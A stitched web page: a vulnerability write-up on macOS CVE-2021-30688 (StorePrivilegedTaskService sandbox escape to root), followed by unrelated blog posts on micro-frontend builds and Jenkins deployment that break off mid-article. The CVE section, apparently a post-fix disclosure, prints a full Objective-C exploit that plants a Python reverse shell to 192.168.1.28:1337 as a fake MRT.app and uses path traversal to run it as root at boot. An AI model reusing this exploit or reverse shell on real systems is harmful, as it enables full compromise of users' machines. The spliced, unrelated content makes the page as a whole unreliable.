Sandbox escape + privilege escalation in StorePrivilegedTaskService
CVE-2021-30688 is a vulnerability, fixed in macOS 11.4, that allowed a malicious application to escape the Mac Application Sandbox and escalate its privileges to root. Exploiting it required an unusual path due to the sandbox profile of the affected service.
Background
At rC3 in 2020 and HITB Amsterdam 2021, Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service that runs as root and is used for only a specific task that needs root privileges, such as installing a package file.
Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:
- Not verifying if a request to install a package comes from the main application.
- Not correctly verifying the authenticity of an update package.
As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…
About StorePrivilegedTaskService
StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.
To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.
First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.
XPC services
An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.
For example, suppose an application needs network functionality for only one feature: downloading a fixed URL. When sandboxing the application, it would then need full network client access (i.e. the com.apple.security.network.client entitlement), and a vulnerability in the application could use that access to send out arbitrary network traffic. If the functionality for performing the request were moved to a separate XPC service, then only that service would need the network permission. Compromising the main application would only allow retrieving that URL, and compromising the XPC service is unlikely, as it contains very little code. This pattern is how Apple uses these services throughout the system.
These services can have one of three possible service types:
- Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
- User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
- System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.
Mach services
While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.
For example, some of the Mach services of lsd:
/System/Library/LaunchDaemons/com.apple.lsd.plist:
<key>MachServices</key>
<dict>
<key>com.apple.lsd.advertisingidentifiers</key>
<true/>
<key>com.apple.lsd.diagnostics</key>
<true/>
<key>com.apple.lsd.dissemination</key>
<true/>
<key>com.apple.lsd.mapdb</key>
<true/>
...
Connecting to an XPC service using the NSXPCConnection API:
[[NSXPCConnection alloc] initWithServiceName:serviceName];
while connecting to a Mach service:
[[NSXPCConnection alloc] initWithMachServiceName:name options:options];
NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods; all serialization of objects passed as arguments is handled automatically.
Permissions
XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sandboxed services can hold entitlements that create sandbox exceptions, for example to allow the service to access the network, but to a non-sandboxed application these entitlements are not interesting to steal, as it already has that access. TCC permissions are also usually granted to the main application, not its XPC services (as that would generate rather confusing prompts for the end user).
A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!
This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.
StorePrivilegedTaskService vulnerability
Sandbox escape
The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check which application initiated the connection. This service has the System service type, so it launches as root.
This vulnerability was exploitable because two defense-in-depth measures were ineffective:
- StorePrivilegedTaskService is sandboxed, but its custom sandbox profile is not restrictive enough.
- For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.
This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];
NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:
// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
// Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;
A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.
The service has a custom profile. The restrictions related to files and folders are:
(allow file-read* file-write*
(require-all
(vnode-type DIRECTORY)
(require-any
(literal "/Library/Application Support/App Store")
(regex #"\.app(download)?(/Contents)?")
(regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
(require-all
(vnode-type REGULAR-FILE)
(require-any
(literal "/Library/Application Support/App Store/adoption.plist")
(literal "/Library/Preferences/com.apple.commerce.plist")
(regex #"\.appdownload/Contents/placeholderinfo")
(regex #"\.appdownload/Icon")
(regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named
(subpath "/System/Library/Caches/com.apple.appstored")
(subpath "/System/Library/Caches/OnDemandResources")
)
The intent of these rules is that this service can modify specific files in applications currently downloading from the App Store, i.e. those with a .appdownload extension: for example, adding a MASReceipt file and changing the icon.
The regexes here are the most interesting part, mainly because they are anchored neither on the left nor on the right. On the left this makes sense, as the full path may be unknown, but the lack of an anchor on the right (with $) is a mistake for the file regexes.
Formulated simply, this sandbox profile allows the following:
- All operations are allowed on directories containing .app anywhere in their path.
- All operations are allowed on files containing .appdownload/Icon anywhere in their path.
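Assuming the profile's regexes behave like ordinary regular expressions (Apple's sandbox profile language has its own engine, so Python's re module is only a stand-in for illustration), the effect of the missing right anchor can be demonstrated:

```python
import re

# File regex from the profile, unanchored on the right, as written.
icon_re = re.compile(r"\.appdownload/Icon")

# A path deep inside an Icon *directory* still matches, because the pattern
# may occur anywhere in the path:
payload = "/tmp/bar.appdownload/Icon/foo.app/Contents/MacOS/MRT"
assert icon_re.search(payload) is not None

# Anchoring on the right with $ would restrict the rule to the Icon file itself:
anchored = re.compile(r"\.appdownload/Icon$")
assert anchored.search(payload) is None
assert anchored.search("/tmp/bar.appdownload/Icon") is not None
```

This is exactly the gap the exploit uses: everything nested below an Icon directory inside a .appdownload directory is writable by the service.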
By creating a specific directory structure in the temporary files directory of our sandboxed application:
bar.appdownload/Icon/
both the sandboxed application and StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it is possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on its executable to dequarantine it.
Privesc
This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.
Creating a new launch daemon or cron job is a common way to escalate privileges through file creation, but the sandbox profile's path requirements would only allow writing in a subdirectory of a subdirectory of the directories holding these config files, so this did not work.
An option that would work is to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:
/Library/LaunchDaemons/com.microsoft.teams.TeamsUpdaterDaemon.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.microsoft.teams.TeamsUpdaterDaemon</string>
<key>MachServices</key>
<dict>
<key>com.microsoft.teams.TeamsUpdaterDaemon</key>
<true/>
</dict>
<key>Program</key>
<string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string>
</dict>
</plist>
The following would work for privilege escalation:
- Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. This is allowed, because the path of the directory contains .app. [1]
- Move a new app bundle to /Applications/Microsoft Teams.app, containing a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
- Connect to the com.microsoft.teams.TeamsUpdaterDaemon Mach service.
However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as one without this requirement, so we kept looking. The requirements are somewhat contradictory: typically, anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume (SSV) in macOS Big Sur means changing any of the built-in applications is also impossible.
By an impressive and ironic coincidence, there is an application that is installed on a new macOS installation, is not on the SSV and runs automatically as root: MRT.app, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updatable without performing a full system upgrade, because they might be needed quickly; this means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content; MRT is the more heavy-handed solution for when Apple needs to ship code to perform the removal.
Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.
Our complete attack consists of the following steps, from sandboxed application to code execution as root:
- Create a new application bundle bar.appdownload/Icon/foo.app in the temporary directory of our sandboxed application, containing a malicious executable.
- Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
- Ask StorePrivilegedTaskService to change the quarantine attribute of the executable file, so it can launch without a prompt.
- Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
- Ask StorePrivilegedTaskService to move bar.appdownload/Icon/foo.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
- Wait for a reboot.
See the full function here:
/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac App Store sandbox of this process allow access.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;
/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];
[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];
assert(!error);
/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];
assert(!error);
/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];
assert(!error);
/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];
NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];
/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"com.apple.quarantine" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
NSLog(@"%@", result);
assert(result == nil);
srand((unsigned int)time(NULL));
/// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
/// However, to move a directory, the permissions on the contents do not matter.
/// It is moved to a randomly named directory, because the service refuses if it already exists.
[conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/", rand()]
withReplyHandler:^(NSError *result) {
NSLog(@"Result: %@", result);
assert(result == nil);
/// Move the malicious directory in place of MRT.app.
[conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/" withReplyHandler:^(NSError *result) {
NSLog(@"Result: %@", result);
/// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
}];
}];
}];
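The destination paths passed to -moveAssetPackAtPath:toPath: above rely on path traversal: they begin under the allowed /System/Library/Caches/OnDemandResources subpath, but the ".." components escape it. The exact path check the service performed is not public; assuming a naive prefix comparison, a short Python sketch shows why it passes:

```python
import os.path

# Destination used by the exploit: an allowed prefix followed by enough ".."
# components to climb back to the filesystem root.
dest = ("/System/Library/Caches/OnDemandResources/AssetPacks/"
        + "../" * 11
        + "Library/Apple/System/Library/CoreServices/MRT.app")

# A naive prefix check on the unresolved path passes:
assert dest.startswith("/System/Library/Caches/OnDemandResources/")

# But the path actually resolves to MRT.app, outside the allowed directory:
assert os.path.normpath(dest) == \
    "/Library/Apple/System/Library/CoreServices/MRT.app"
```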
Fix
Apple has pushed out a fix in the macOS 11.4 release. They implemented all three of the recommended changes:
- The entitlements of the process initiating the connection to StorePrivilegedTaskService are now checked.
- The sandbox profile of StorePrivilegedTaskService was tightened.
- The path traversal vulnerabilities in the subdirectory check were fixed.
This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.
[1] This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, a process needs the file-write-unlink permission on all of its contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed! ↩︎
9. Wrapping Up Our Journey Implementing a Micro Frontend
We hope you now have a better understanding of how you can successfully create a micro-front end architecture. Before we call it a day, let’s give a quick recap of what was covered.
What You Learned
- Why We Implemented a Micro Frontend — You learned where we started, specifically what our architecture used to look like and where the problems existed. You then learned how we planned on solving those problems with a new architecture.
- Introducing the Monorepo and NX — You learned how we combined two of our repositories into one: a monorepo. You then saw how we leveraged the NX framework to identify which part of the repository changed, so we only needed to rebuild that portion.
- Introducing Module Federation — You learned how we leverage webpack's Module Federation to break our main application into a series of smaller applications called micro-apps, the purpose of which was to build and deploy these applications independently of one another.
- Module Federation — Managing Your Micro-Apps — You learned how we consolidated configurations and logic pertaining to our micro-apps so we could easily manage and serve them as our codebase continued to grow.
- Module Federation — Sharing Vendor Code — You learned the importance of sharing vendor library code between applications and some related best practices.
- Module Federation — Sharing Library Code — You learned the importance of sharing custom library code between applications and some related best practices.
- Building and Deploying — You learned how we build and deploy our application using this new model.
Key Takeaways
If you take anything away from this series, let it be the following:
The Earlier, The Better
We can tell you from experience that implementing an architecture like this is much easier if you have the opportunity to start from scratch. If you are lucky enough to start from scratch when building out an application and are interested in a micro-frontend, laying the foundation before anything else is going to make your development experience much better.
Evaluate Before You Act
Before you decide on an architecture like this, make sure it’s really what you want. Take the time to assess your issues and how your company operates. Without company support, pulling off this approach is extremely difficult.
Only Build What Changed
Using a tool like NX is critical to a monorepo, allowing you to only rebuild those parts of the system that were impacted by a change.
Micro-Frontends Are Not For Everyone
We know this type of architecture is not for everyone, and you should truly consider what your organization needs before going down this path. However, it has been very rewarding for us, and has truly transformed how we deliver solutions to our customers.
Don’t Forget To Share
When it comes to module federation, sharing is key. Learning when and how to share code is critical to the successful implementation of this architecture.
Be Careful Of What You Share
Sharing things like state between your micro-apps is a dangerous thing in a micro-frontend architecture. Learning to put safeguards in place around these areas is critical, as well as knowing when it might be necessary to deploy all your applications at once.
Summary
We hope you enjoyed this series and learned a thing or two about the power of NX and module federation. If this article can help just one engineer avoid a mistake we made, then we’ll have done our job. Happy coding!
9. Wrapping Up Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium.
8. Building & Deploying
This is post 8 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
This article documents the final phase of our new architecture where we build and deploy our application utilizing our new micro-frontend model.
The Problem
If you have followed along up until this point, you can see how we started with a relatively simple architecture. Like a lot of companies, our build and deployment flow looked something like this:
- An engineer merges their code to master.
- A Jenkins build is triggered that lints, tests, and builds the entire application.
- The built application is then deployed to a QA environment.
- End-to-end (E2E) tests are run against the QA environment.
- The application is deployed to production. In a CI/CD flow, this occurs automatically if the E2E tests pass; otherwise, this is a manual deployment.
In our new flow this would no longer work. In fact, one of our biggest challenges in implementing this new architecture was in setting up the build and deployment process to transition from a single build (as demonstrated above) to multiple applications and libraries.
The Solution
Our new solution involved three primary Jenkins jobs:
- Seed Job — Responsible for identifying which applications/libraries need to be rebuilt (via the nx affected command). Once this is determined, its primary purpose is to kick off one or more instances of the two job types discussed next.
- Library Job — Responsible for linting and testing any library workspace that was impacted by a change.
- Micro-App Jobs — A series of jobs pertaining to each micro-app. Responsible for linting, testing, building, and deploying the micro-app.
With this understanding in place, let’s walk through the steps of the new flow:
Phase 1 — In our new flow, phase 1 includes building and deploying the code to our QA environments where it can be properly tested and viewed by our various internal stakeholders (engineers, quality assurance, etc.):
- An engineer merges their code to master. In the diagram below, an engineer on Team 3 merges some code that updates something in their application (Application C).
- The Jenkins seed job is triggered, and it identifies what applications and libraries were impacted by this change. This job now kicks off an entirely independent pipeline related to the updated application. In this case, it kicked off the Application C pipeline in Jenkins.
- The pipeline now lints, tests, and builds Application C. It’s important to note here how it’s only dealing with a piece of the overall application. This greatly improves the overall build times and avoids long queues of builds waiting to run.
- The built application is then deployed to the QA environments.
- End-to-end (E2E) tests are run against the QA environments.
- Our deployment is now complete. For our purposes, we felt that a manual deployment to production was a safe approach for us and one that still offered us the flexibility and efficiency we needed.
Phase 2 — This phase (shown in the diagram after the dotted line) occurred when an engineer was ready to deploy their code to production:
- An engineer deployed their given micro-app to staging. In this case, the engineer would go into the build for Application C and deploy from there.
- For our purposes, we deployed to a staging environment before production to perform a final spot check on our application. In this type of architecture, you may only encounter a bug related to the decoupled nature of your micro-apps. You can read more about this type of issue in the previous article under the Sharing State/Storage/Theme section. This final staging environment allowed us to catch these issues before they made their way to production.
- The application is then deployed to production.
While this flow has more steps than our original one, we found that the pros outweigh the cons. Our builds are now more efficient as they can occur in parallel and only have to deal with a specific part of the repository. Additionally, our teams can now move at their own pace, deploying to production when they see fit.
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn the specifics of how we build and deploy our applications.
Build Strategy
We will now cover the three job types introduced above in more detail: the seed job, the library job, and the micro-app jobs.
The Seed Job
This job is responsible for first identifying what applications/libraries needed to be rebuilt. How is this done? We will now come full circle and understand the importance of introducing the NX framework that we discussed in a previous article. By taking advantage of this framework, we created a system by which we could identify which applications and libraries (our “workspaces”) were impacted by a given change in the system (via the nx affected command). Leveraging this functionality, the build logic was updated to include a Jenkins seed job. A seed job is a normal Jenkins job that runs a Job DSL script and in turn, the script contains instructions that create and trigger additional jobs. In our case, this included micro-app jobs and/or a library job which we’ll discuss in detail later.
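The seed job's core decision can be sketched as follows. This is an illustration, not the actual pipeline code: the Jenkins job names are hypothetical, and the nx print-affected invocation and its comma-separated output format are assumptions (newer NX versions expose the same information via nx show projects --affected):

```python
import subprocess

def affected_projects(base, head):
    """Ask NX which workspaces a commit range touches.

    Assumes the older `nx print-affected --select=projects` form, which
    prints a comma-separated list of project names.
    """
    out = subprocess.run(
        ["npx", "nx", "print-affected", f"--base={base}", f"--head={head}",
         "--select=projects"],
        capture_output=True, text=True, check=True,
    ).stdout
    return [p.strip() for p in out.split(",") if p.strip()]

def jobs_to_trigger(projects, app_names):
    """Map affected workspaces to Jenkins jobs: one job per micro-app,
    plus a single shared library job if any non-app workspace changed."""
    jobs = [f"micro-app-{p}" for p in projects if p in app_names]
    if any(p not in app_names for p in projects):
        jobs.append("library-job")
    return jobs

# Example: a change touching the host app and a shared library triggers
# the host's micro-app job plus the single library job.
apps = {"host", "application-c"}
assert jobs_to_trigger(["host", "shared-ui"], apps) == \
    ["micro-app-host", "library-job"]
```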
Jenkins Status — An important aspect of the seed job is to provide a visualization for all the jobs it kicks off. All the triggered application jobs are shown in one place along with their status:
- Green — Successful build
- Yellow — Unstable
- Blue — Still processing
- Red (not shown) — Failed build
GitHub Status — Since multiple independent Jenkins builds are triggered for the same commit ID, we had to pay attention to how the changes are represented in GitHub, so as not to lose visibility of broken builds in the PR process. Each job registers itself with a unique context in GitHub, providing feedback on which sub-job failed directly in the PR process:
Performance, Managing Dependencies — Before a given micro-app and/or library job can perform its necessary steps (lint, test, build), it needs to install the necessary dependencies for those actions (those defined in the package.json file of the project). Doing this every single time a job is run is very costly in terms of resources and performance. Since all of these jobs need the same dependencies, it makes much more sense if we can perform this action once so that all the jobs can leverage the same set of dependencies.
To accomplish this, the node execution environment was dockerised with all necessary dependencies installed inside a container. As shown below, the seed job maintains the responsibility for keeping this container in sync with the required dependencies. The seed job determines if a new container is required by checking if changes have been made to package.json. If changes are made, the seed job generates the new container prior to continuing any further analysis and/or build steps. The jobs that are kicked off by the seed (micro-app jobs and the library job) can then leverage that container for use:
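A minimal sketch of how such a container-reuse decision can be keyed on package.json, assuming a content-hash tagging scheme (the article does not describe the exact mechanism, so the helper names and tag format here are hypothetical):

```python
import hashlib

def dependency_image_tag(package_json_bytes):
    """Derive a stable image tag from the dependency manifest, so an
    unchanged package.json maps to an already-built container."""
    return "deps-" + hashlib.sha256(package_json_bytes).hexdigest()[:12]

def needs_rebuild(package_json_bytes, published_tags):
    """Rebuild the dependency container only if no image exists for the
    current manifest contents."""
    return dependency_image_tag(package_json_bytes) not in published_tags

manifest = b'{"dependencies": {"react": "17.0.2"}}'
tag = dependency_image_tag(manifest)
assert needs_rebuild(manifest, set())        # no image yet: build one
assert not needs_rebuild(manifest, {tag})    # unchanged manifest: reuse it
```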
This approach led to the following benefits:
- This proved to be much faster than downloading all development dependencies for each build step every time they were needed.
- The use of a pre-populated container reduced the load on the internal Nexus repository manager as well as the network traffic.
- Allowed us to run the various build steps (lint, unit test, package) in parallel thus further improving the build times.
Performance, Limiting The Number Of Builds Run At Once — To facilitate the smooth operation of the system, the seed jobs on master and feature branch builds use slightly different logic with respect to the number of builds that can be kicked off at any one time. This is necessary as we have a large number of active development branches and triggering excessive jobs can lead to resource shortages, especially with required agents. When it comes to the concurrency of execution, the differences between the two are:
- Master branch — Commits immediately trigger all builds concurrently.
- Feature branches — Allow only one seed job per branch to avoid system overload as every commit could trigger 10+ sub jobs depending on the location of the changes.
Another way we reduce the number of builds generated is in how the nx affected command is used on the master branch versus the feature branches:
- Master branch — Will be called against the latest tag created for each application build. Each master / production build produces a tag of the form APP<uniqueAppId>_<buildversion>. This is used to determine if the specific application needs to be rebuilt based on the changes.
- Feature branches — We use master as a reference for the first build on the feature branch, and any subsequent build will use the commit-id of the last successful build on that branch. This way, we are not constantly rebuilding all applications that may be affected by a diff against master, but only the applications that are changed by the commit.
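The branch-dependent choice of base ref described above can be sketched as a small helper (the function is hypothetical; the tag form APP<uniqueAppId>_<buildversion> is taken from the article):

```python
def base_ref(branch, latest_app_tag=None, last_good_commit=None):
    """Pick the git ref that `nx affected --base=...` should diff against.

    - master: diff against the app's latest release tag (e.g. "APP3_1.4.2").
    - feature branch, first build: diff against master.
    - feature branch, later builds: diff against the last successful commit,
      so only projects changed by the new commits are rebuilt.
    """
    if branch == "master":
        if latest_app_tag is None:
            raise ValueError("master builds diff against the last release tag")
        return latest_app_tag
    return last_good_commit if last_good_commit else "master"

assert base_ref("master", latest_app_tag="APP3_1.4.2") == "APP3_1.4.2"
assert base_ref("feature/login") == "master"
assert base_ref("feature/login", last_good_commit="abc123") == "abc123"
```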
To summarize the role of the seed job, the diagram below showcases the logical steps it takes to accomplish the tasks discussed above.
The Library Job
We will now dive into the jobs that Seed kicks off, starting with the library job. As discussed in our previous articles, our applications share code from a libs directory in our repository.
Before we go further, it’s important to understand how library code gets built and deployed. When a micro-app is built (ex. nx build host), its deployment package contains not only the application code but also all the libraries that it depends on. When we build the Host and Application 1, the build creates a number of files starting with “libs_…” and “node_modules…”. This demonstrates how all the shared code (both vendor libraries and your own custom libraries) needed by a micro-app is packaged within it (i.e. the micro-apps are self-reliant). While it may look like a given micro-app is extremely bloated in terms of the number of files it contains, keep in mind that a lot of those files may not actually get leveraged if the micro-apps are sharing things appropriately.
This means building the actual library code is a part of each micro-app’s build step, which is discussed below. However, if library code is changed, we still need a way to lint and test that code. If you kicked off 5 micro-app jobs, you would not want each of those jobs to perform this action as they would all be linting and testing the exact same thing. Our solution to this was to have a separate Jenkins job just for our library code, as follows:
- Using the nx affected:libs command, we determine which library workspaces were impacted by the change in question.
- Our library job then lints/tests those workspaces. In parallel, our micro-apps also lint, test and build themselves.
- Before a micro-app can finish its job, it checks the status of the libs build. As long as the libs build was successful, it proceeds as normal. Otherwise, all micro-apps fail as well.
The Micro-App Jobs
Now that you understand how the seed and library jobs work, let’s get into the last job type: the micro-app jobs.
Configuration — As discussed previously, each micro-app has its own Jenkins build. The build logic for each application is implemented in a micro-app specific Jenkinsfile that is loaded at runtime for the application in question. The pattern for these small snippets of code looks something like the following:
The jenkins/Jenkinsfile.template (leveraged by each micro-app) defines the general build logic for a micro-application. The default configuration in that file can then be overwritten by the micro-app:
This approach keeps all our build logic in a single place while easily allowing us to add more micro-apps and scale accordingly. Combined with the job DSL, this makes adding a new application to the build / deployment logic a straightforward, easy-to-follow process.
Managing Parallel Jobs — When we first implemented the build logic for the jobs, we attempted to implement as many steps as possible in parallel to make the builds as fast as possible, which you can see in the Jenkins parallel step below:
After some testing, we found that linting + building the application together takes about as much time as running the unit tests for a given product. As a result, we combined the two steps (linting, building) into one (assets-build) to optimize the performance of our build. We highly recommend you do your own analysis, as this will vary per application.
Deployment strategy
Now that you understand how the build logic works in Jenkins, let’s see how things actually get deployed.
Checkpoints — When an engineer is ready to deploy their given micro-app to production, they use a checkpoint. Upon clicking into the build they wish to deploy, they select the checkpoints option. As discussed in our initial flow diagram, we force our engineers to first deploy to our staging environment for a final round of testing before they deploy their application to production.
Once approval is granted, the engineer can then deploy the micro-app to production using another checkpoint:
S3 Strategy — The new logic required a rework of the whole deployment strategy as well. In our old architecture, the application was deployed as a whole to a new S3 location and then the central gateway application was informed of the new location. This forced the clients to reload the entire application as a whole.
Our new strategy reduces the deployment impact to the customer by only updating the code on S3 that actually changed. This way, whenever a customer pulls down the code for the application, they are pulling a majority of the code from their browser cache and only updated files have to be brought down from S3.
One thing we had to be careful about was ensuring the index.html file is only updated after all the granular files are pushed to S3. Otherwise, we run the risk of our updated application requesting files that may not have made their way to S3 yet.
Bootstrapper Job — As discussed above, micro-apps are typically deployed to an environment via an individual Jenkins job:
However, we ran into a number of instances where we needed to deploy all micro-apps at the same time. This included the following scenarios:
- Shared state — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state. When we made updates to these areas, we could encounter bugs when the apps got out of sync.
- Shared theme — Since we also had a global theme that all micro-apps inherited from, we could encounter styling issues when the theme was updated and apps got out of sync.
- Vendor Library Update — Updating a vendor library like react, where only one version of the library can be loaded at a time.
To address these issues, we created the bootstrapper job. This job has two steps:
- Build — The job is run against a specific environment (qa-development, qa-staging, etc.) and pulls down a completely compiled version of the entire application.
- Deploy — The artifact from the build step can then be deployed to the specified environment.
Conclusion
Our new build and deployment flow was the final piece of our new architecture. Once it was in place, we were able to deploy individual micro-apps to our various environments in a reliable and efficient manner. Please see the last article in this series for a quick recap of everything we learned.
8. Building & Deploying was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
7. Module Federation — Sharing Library Code
Module Federation — Sharing Library Code
This is post 7 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
This article focuses on the importance of sharing your custom library code between applications and some related best practices.
The Problem
